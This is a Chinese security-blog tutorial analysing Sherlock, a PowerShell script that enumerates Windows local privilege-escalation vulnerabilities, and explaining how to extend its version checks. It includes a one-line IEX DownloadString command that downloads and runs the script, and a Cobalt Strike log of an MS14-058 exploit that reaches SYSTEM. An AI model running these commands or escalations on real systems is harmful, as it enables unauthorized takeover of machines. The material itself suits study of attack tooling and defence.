针对提权小神器Sherlock的分析与利用

小龙 2017-4-12 工具介绍 0 0

*原创作者:zusheng,本文属FreeBuf原创奖励计划,未经许可禁止转载

0×01 Sherlock简介

Sherlock是一个在Windows下用于本地提权的PowerShell脚本。

目前包含了以下漏洞:

  • MS10-015 : User Mode to Ring (KiTrap0D)
  • MS10-092 : Task Scheduler
  • MS13-053 : NTUserMessageCall Win32k Kernel Pool Overflow
  • MS13-081 : TrackPopupMenuEx Win32k NULL Page
  • MS14-058 : TrackPopupMenu Win32k Null Pointer Dereference
  • MS15-051 : ClientCopyImage Win32k
  • MS15-078 : Font Driver Buffer Overflow
  • MS16-016 : ‘mrxdav.sys’ WebDAV
  • MS16-032 : Secondary Logon Handle

0×02 初步使用

本地加载脚本

Import-Module Sherlock.ps1

远程加载脚本

IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/rasta-mouse/Sherlock/master/Sherlock.ps1')

发现漏洞:

PS C:\Users\Administrator> Find-AllVulns

Title      : User Mode to Ring (KiTrap0D)
MSBulletin : MS10-015
CVEID  : 2010-0232
Link   : https://www.exploit-db.com/exploits/11199/
VulnStatus : Not supported on 64-bit systems

Title  : Task Scheduler .XML
MSBulletin : MS10-092
CVEID  : 2010-3338, 2010-3888
Link   : https://www.exploit-db.com/exploits/19930/
VulnStatus : Not Vulnerable

Title  : NTUserMessageCall Win32k Kernel Pool Overflow
MSBulletin : MS13-053
CVEID  : 2013-1300
Link   : https://www.exploit-db.com/exploits/33213/
VulnStatus : Not supported on 64-bit systems

Title  : TrackPopupMenuEx Win32k NULL Page
MSBulletin : MS13-081
CVEID  : 2013-3881
Link   : https://www.exploit-db.com/exploits/31576/
VulnStatus : Not supported on 64-bit systems

Title  : TrackPopupMenu Win32k Null Pointer Dereference
MSBulletin : MS14-058
CVEID  : 2014-4113
Link   : https://www.exploit-db.com/exploits/35101/
VulnStatus : Appears Vulnerable

Title  : ClientCopyImage Win32k
MSBulletin : MS15-051
CVEID  : 2015-1701, 2015-2433
Link   : https://www.exploit-db.com/exploits/37367/
VulnStatus : Appears Vulnerable

Title  : Font Driver Buffer Overflow
MSBulletin : MS15-078
CVEID  : 2015-2426, 2015-2433
Link   : https://www.exploit-db.com/exploits/38222/
VulnStatus : Not Vulnerable

Title  : 'mrxdav.sys' WebDAV
MSBulletin : MS16-016
CVEID  : 2016-0051
Link   : https://www.exploit-db.com/exploits/40085/
VulnStatus : Not supported on 64-bit systems

Title  : Secondary Logon Handle
MSBulletin : MS16-032
CVEID  : 2016-0099
Link   : https://www.exploit-db.com/exploits/39719/
VulnStatus : Appears Vulnerable

Appears Vulnerable就是存在漏洞

验证:

PS C:\Users\Administrator> elevate ms14-058 smb

[*] Tasked beacon to elevate and spawn windows/beacon_smb/bind_pipe (127.0.0.1:1337)
[+] host called home, sent: 105015 bytes
[+] received output:
[*] Getting Windows version...
[*] Solving symbols...
[*] Requesting Kernel loaded modules...
[*] pZwQuerySystemInformation required length 51216
[*] Parsing SYSTEM_INFO...
[*] 173 Kernel modules found
[*] Checking module \SystemRoot\system32\ntoskrnl.exe
[*] Good! nt found as ntoskrnl.exe at 0x0264f000
[*] ntoskrnl.exe loaded in userspace at: 40000000
[*] pPsLookupProcessByProcessId in kernel: 0xFFFFF800029A21FC
[*] pPsReferencePrimaryToken in kernel: 0xFFFFF800029A59D0
[*] Registering class...
[*] Creating window...
[*] Allocating null page...
[*] Getting PtiCurrent...
[*] Good! dwThreadInfoPtr 0xFFFFF900C1E7B8B0
[*] Creating a fake structure at NULL...
[*] Triggering vulnerability...
[!] Executing payload...

[+] host called home, sent: 204885 bytes
[+] established link to child beacon: 192.168.56.105

[+] established link to parent beacon: 192.168.56.105
beacon> getuid
[*] Tasked beacon to get userid
[+] host called home, sent: 8 bytes
[*] You are NT AUTHORITY\SYSTEM (admin)

可以发现提权成功,注意Sherlock只是验证,并不能帮助你直接进行利用。

0×03 隐藏的小技巧

除了上述的基本功能外,脚本里面还隐藏了一些作者没有介绍到的小功能

获取软件版本

Sherlock还可以让我们来获取软件的版本号,我们只需要运行Get-FileVersionInfo命令即可。

演示:

1.png

获取CPU架构

运行Get-Architecture命令,我们就可以知道CPU的架构是32位还是64位的。

演示:

2.png

0×04 Sherlock漏洞验证原理分析

Sherlock除了作者已经加入的那些漏洞,我们还可以自己来加入感兴趣的漏洞。再添加漏洞之前,我们先来分析一下Sherlock漏洞验证的原理。

在Sherlock中,每一个漏洞验证模块都是一个function,具体形式如下:

function Find-MS16032 {

}

然后使用Get-Architecture来获取系统版本,判断系统版本是否存在提权漏洞。符合再进行下一步判断。

if ( $Architecture[1] -eq "AMD64" -or $Architecture[0] -eq "32-bit" )

然后通过Get-FileVersionInfo获取存在漏洞的文件的版本信息,主要提取后面两段数字。

3.png

然后就简单了,用一个switch+if对比版本就行了:

switch ( $Build ) {

        7600 { if ( $Revision -ge "16000" ) { $VulnStatus = "Appears Vulnerable" } }
        7601 { if ( $Revision -le "23348" ) { $VulnStatus = "Appears Vulnerable" } }
        9200 { if ( $Revision -le "21768" ) { $VulnStatus = "Appears Vulnerable" } }
        9600 { if ( $Revision -le "18230" ) { $VulnStatus = "Appears Vulnerable" } }
        10240 { if ( $Revision -le "16724" ) { $VulnStatus = "Appears Vulnerable" } }
        10586 { if ( $Revision -le "162" ) { $VulnStatus = "Appears Vulnerable" } }
        default { $VulnStatus = "Not Vulnerable" }

    }

然后我们自己添加漏洞就简单了,在function New-ExploitTable中加入漏洞信息。

4.png

测试一下,我们先来创建一个function Find-MS16135

function Find-MS16135 {
    $MSBulletin = "MS16-135"
    $VulnStatus = "Appears Vulnerable"
    Set-ExploitTable $MSBulletin $VulnStatus
}

然后在function Find-AllVulns中加入Find-MS16135就OK啦。

5.png

测试看看:

6.png

0×05 总结

整个框架总体思路就是这样咯,接下来就看小伙伴们来查找存在漏洞的文件版本了,目前我还没好的思路可以快速去寻找存在漏洞的文件版本,不知道大家有没有好的思路求分享啊。

项目地址:https://github.com/rasta-mouse/Sherlock

*原创作者:zusheng,本文属FreeBuf原创奖励计划,未经许可禁止转载

转载请注明来自华盟网,本文标题:《针对提权小神器Sherlock的分析与利用》

喜欢 (0) 发布评论